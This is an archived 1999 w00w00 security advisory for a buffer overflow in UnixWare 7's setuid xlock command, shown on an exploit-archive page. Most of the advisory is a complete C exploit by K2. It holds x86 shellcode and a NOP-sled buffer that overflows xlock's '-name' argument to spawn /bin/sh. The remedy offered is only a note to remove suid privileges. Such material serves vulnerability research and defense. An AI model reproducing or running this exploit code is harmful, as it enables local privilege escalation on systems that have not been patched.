unixware.xlock.txt

unixware.xlock.txt: Posted Nov 26, 1999; [w00giving '99 #7]: UnixWare 7's xlock. The xlock command on SCO's UnixWare 7 has improper bounds checking on the username passed (via argv[1]), which can cause a buffer overflow when a lengthy username is passed. Exploit by K2; tags | exploit, overflow; systems | unixware; SHA-256 | 42dca4082a24f106af872bb2a9c3e695482d75141ae5f77e6e01c1aec727dbff; Download | Favorite | View

unixware.xlock.txt


-----Original Message-----
Date: Fri, 26 Nov 1999 04:29:42 +0300 (MSK)
From: Matt Conover <shok@cannabis.dataforce.net>
To: news@technotronic.com
Subject: [w00giving '99 #7]: UnixWare 7's xlock
Message-ID:
<Pine.LNX.3.95.991126042855.31331C-100000@cannabis.dataforce.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

The xlock command on SCO's UnixWare 7 has improper bounds checking on the
username passed (via argv[1]), which can cause a buffer overflow when
a lengthy username is passed.

----------------------------------------------------------------------------
-
Exploit (by K2):

// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

#define SIZE 1200
#define NOPDEF 601
#define DEFOFF -400

const char x86_nop=0x90;
long nop=NOPDEF,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
{
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset);
    execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);

    printf("exec failed!\n");
    return 0;
}

----------------------------------------------------------------------------
-
Patch:

As stated in the previous advisory, wait for SCO to release a patch.
Because of the /var/sadm permissions vulnerability we published earlier
hasn't been fixed yet, be sure you take off suid privileges on the backed
up binary! =)
----------------------------------------------------------------------------
-

Hellos to the usuals

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

unixware.xlock.txt

unixware.xlock.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

unixware.xlock.txt

Share This

unixware.xlock.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems